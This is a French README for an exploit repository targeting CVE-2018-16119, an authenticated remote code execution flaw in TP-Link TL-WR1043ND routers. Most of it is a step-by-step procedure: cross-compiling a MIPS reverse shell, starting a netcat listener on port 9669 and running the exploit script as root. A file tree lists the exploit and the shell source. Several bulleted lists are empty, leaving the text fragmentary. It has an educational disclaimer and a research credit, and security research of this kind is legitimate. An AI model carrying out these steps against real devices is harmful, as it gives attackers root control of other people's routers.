
TP-Link TL-WR1043ND - Exécution de code à distance authentifiée
CVE-2018-16119 est une vulnérabilité critique d'exécution de code à distance authentifiée affectant les routeurs TP-Link TL-WR1043ND. Cette vulnérabilité permet à un attaquant authentifié d'exécuter des commandes arbitraires sur l'appareil cible avec les privilèges root, pouvant conduire à une compromission complète du système.
Détails CVE : CVE-2018-16119
Une fois exploitée, un attaquant obtient un accès shell root au routeur, lui permettant de :
# Installation des paquets requis
sudo apt-get update
sudo apt-get install netcat docker.io
L'exploit nécessite un binaire de reverse shell MIPS big-endian. Suivez ces étapes pour le compiler :
# Copier le code source dans /tmp
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/
# Utiliser un conteneur Docker avec les outils de cross-compilation MIPS
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash
À l'intérieur du conteneur Docker :
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh
Quittez Docker et copiez le binaire compilé :
cp /tmp/shh exploit/tftp_server/
Ouvrez un terminal et démarrez un écouteur netcat sur le port 9669 :
Linux :
nc -l -p 9669 -vv
macOS :
nc -l 9669 -vv
Exécutez le script d'exploit avec les privilèges root (nécessaires pour le serveur TFTP) :
sudo python3 exploit/exploit.py
Le script va :
Une fois la connexion établie :
CVE-2018-16119/
├── exploit/
│ ├── exploit.py # Script d'exploit principal
│ ├── requirements.txt # Dépendances Python
│ ├── notes.txt # Notes supplémentaires
│ └── tftp_server/
│ ├── reverse_shell_mipsbe.c # Code source du reverse shell
│ └── shh # Binaire MIPS compilé
├── firmware/
│ └── wr740nv4_webrevert.bin # Firmware exemple
├── squashfs-root/ # Système de fichiers du firmware extrait
└── README.md # Ce fichier
Cette vulnérabilité a été divulguée de manière responsable et ne doit être utilisée que pour :
⚠️ AVERTISSEMENT : Cet exploit est fourni à des fins éducatives et de test autorisé uniquement. L'accès non autorisé à des systèmes informatiques est illégal et contraire à l'éthique. Les utilisateurs sont responsables de s'assurer qu'ils disposent des autorisations appropriées avant d'utiliser cet outil.
Installer les prérequis Python :
pip3 install -r exploit/requirements.txt
Permission refusée pour le serveur TFTP :
Échec de la connexion :
Aucune réponse du shell :
id ou pwdCette recherche démontre des failles de sécurité critiques dans le firmware des appareils embarqués. La vulnérabilité souligne l'importance de :
Recherche par : Alejandro Parodi
Twitter : @hdbreaker
LinkedIn : Alejandro Parodi
Cette recherche a été menée à des fins éducatives et pour améliorer la sécurité des systèmes embarqués. Veuillez l'utiliser de manière responsable.